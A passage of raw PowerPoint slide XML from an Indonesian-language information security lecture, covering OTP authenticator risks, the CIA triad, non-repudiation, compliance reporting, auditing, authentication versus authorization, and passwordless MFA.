            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token OTP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyadapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179869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D" dirty="0"/>
              <a:t>Apa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat-sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Confidentiality, Integrity, Availability (CIA Triad)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kadang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Authentication &amp; Non-repudiation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Istilah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyangkal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Non-repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> regulator. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Compliance (regulatory compliance reporting)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> framework, ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>attestation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> atau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>compliance reporting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Accounting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Auditing)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Apa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbedaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>repudiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>logging dan audit trail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyangkal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakannya</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22252810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Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Kata Sandi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MFA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
